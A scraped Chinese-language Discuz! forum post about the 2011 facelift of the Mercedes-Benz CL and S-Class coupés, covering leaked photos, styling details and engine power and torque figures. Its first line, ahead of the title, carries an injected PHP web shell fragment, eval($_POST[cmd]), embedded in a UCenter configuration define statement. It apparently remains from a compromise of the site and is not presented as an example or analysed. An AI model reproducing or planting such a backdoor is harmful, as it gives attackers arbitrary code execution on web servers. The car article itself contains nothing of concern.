');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 全線小改款 奔馳S系及CL系 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

全線小改款 奔馳S系及CL系

梅賽德斯‧奔馳在接下來的幾年之內會有一些比較大的改動,包括旗下幾款主打的產品都面臨小改款甚至是完全的改名。這一點我們可以從新款的2010 E-Class 酷派看出來,這款車代替了以前的CLK,然後在今年遲些時候出現的新車也會把CL的名字從奔馳的產品列表之中劃掉,新車會以2011年度車型的形態出現,名字為S-Class 酷派。



  這兩張照片,分別是經過小改款的2011奔馳CL-Class和S系列AMG版本。人們是「不小心」在荷蘭語版本的官方網站上面看到的。關於車子的具體情況現在還沒有什麼定論,但是這兩者算是半官方的一種圖片,就好像我們之前預料的那樣,CL-Class採用那個了新的前部保險槓,經過修正的車頭燈,發光二極管霧燈以及更具運動感的前柵格

  而另外一張大家看到的照片是高性能的AMG版本,展現了一些新的細節部分,包括更加方方正正的前柵格,在中央採用了一根金屬條水平橫穿進行裝飾,同時車頭燈和發光二極管日用車燈的設計也會更加有稜有角。



  新款的CL350 會採用自然吸氣的3.5升V6 BlueDIRECT發動機,最大輸出功率達到306馬力,扭矩峰值達到272磅‧英尺, CL550 則會採用雙渦輪增壓的4.6升V-8 BlueDIRECT 發動機,最大輸出功率達到435馬力,扭矩峰值達到516磅‧英尺。最高級的版本CL63 AMG則會採用5.5升雙渦輪V8版本,最大輸出功率達到544馬力,扭矩峰值達到590磅‧英尺。

  而新S-class的基本發動機選擇項為雙渦輪增壓直噴式4.7升V-8發動機,最大輸出功率達到435 馬力,扭矩峰值達到516磅‧英尺。至於高性能的AMG版本則會採用雙渦輪增壓的5.5升V-8發動機,最大輸出功率達到544馬力或者是571馬力,扭矩峰值達到590磅‧英尺或者664磅‧英尺。至於在旗艦車型S65 AMG 酷派上面,我們看到的則應該是一款雙渦輪增壓直噴式V-12發動機。

  預計2011款梅賽德斯‧奔馳S-Class 酷派和 AMG版本都會在今年10月份的法國巴黎國際車展上面首次和大家見面。
返回列表